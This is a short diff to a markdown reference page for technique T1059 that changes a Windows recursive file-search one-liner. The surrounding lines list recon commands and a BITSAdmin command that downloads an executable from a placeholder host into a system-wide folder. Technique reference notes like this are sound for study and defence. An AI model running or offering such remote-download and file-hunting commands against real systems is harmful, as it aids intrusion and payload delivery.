--- a/Techniques/T1059/T1059.md
+++ b/Techniques/T1059/T1059.md
@@ -20,7 +20,7 @@
 * Check process info: `tasklist`
 
 ### File
-* Search local files: `cd c:\ && dir /b /s <file_name>`
+* Search local files: `cd c:\ & dir /b /s <file_name>`
 * Check file content: `type <file_path>`
 * Download a remote file:
   * BITSAdmin: `bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe`
